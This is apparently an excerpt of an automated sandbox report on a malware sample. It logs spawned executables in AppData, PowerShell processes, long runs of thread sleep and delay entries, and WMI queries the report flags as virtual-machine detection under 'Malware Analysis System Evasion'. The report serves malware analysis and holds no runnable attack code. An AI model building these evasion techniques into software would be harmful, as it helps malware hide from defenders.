                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\file.exe TID: 5084Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 3848Thread sleep count: 9732 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4688Thread sleep count: 9481 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1200000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1199875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1199624s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1199498s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1199344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1199203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1199047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1198938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1198794s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1198680s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1198547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1198420s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1198297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1198170s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1198031s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1197921s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1197797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1197671s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1197536s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1197391s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1197265s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1197152s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1196956s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1196797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1196679s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1196547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1196250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1196094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1195921s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1195809s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1195688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1195547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1195436s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1195328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1195200s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1195076s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194625s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194515s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194077s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1193969s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1193844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1193733s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1193623s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 6044Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 6044Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 6020Thread sleep count: 9624 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1592Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1592Thread sleep count: 43 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 5984Thread sleep count: 9758 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 4984Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 4984Thread sleep count: 40 > 30
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 5388Thread sleep count: 9746 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5040Thread sleep time: -15679732462653109s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 996Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 2980Thread sleep time: -21213755684765971s >= -30000s
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 2980Thread sleep count: 38 > 30
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1668Thread sleep count: 9716 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5892Thread sleep time: -19369081277395017s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 836Thread sleep count: 844 > 30
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1200000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1199662s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1199537s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1199405s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1199200s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1198760s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1198310s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1197900s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1197786s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1197349s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1196761s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1196360s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1196005s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1195758s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1195505s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1194897s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1194753s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1194348s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1200000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199875Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199624Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199498Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199344Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199203Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199047Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198938Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198794Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198680Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198547Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198420Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198297Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198170Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198031Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197921Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197797Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197671Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197536Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197391Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197265Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197152Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196956Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196797Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196679Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196547Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196250Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196094Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195921Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195809Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195688Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195547Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195436Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195328Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195200Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195076Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194953Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194844Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194734Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194625Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194515Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194406Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194297Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194187Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194077Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193969Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193844Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193733Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193623Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1200000
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199662
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199537
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199405
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199200
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1198760
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1198310
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197900
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197786
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197349
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196761
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196360
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196005
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1195758
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1195505
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194897
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194753
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194348
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 9732Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9388Jump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 9481Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWindow / User API: threadDelayed 9624Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeWindow / User API: threadDelayed 9758Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWindow / User API: threadDelayed 9746
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8218
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeWindow / User API: threadDelayed 9716
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9319
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWindow / User API: threadDelayed 844
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1200000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199875Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199624Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199498Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199344Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199203Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199047Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198938Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198794Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198680Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198547Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198420Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198297Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198170Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198031Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197921Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197797Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197671Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197536Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197391Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197265Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197152Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196956Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196797Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196679Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196547Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196250Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196094Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195921Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195809Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195688Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195547Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195436Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195328Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195200Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195076Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194953Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194844Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194734Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194625Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194515Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194406Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194297Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194187Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194077Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193969Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193844Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193733Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193623Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477Jump to behavior
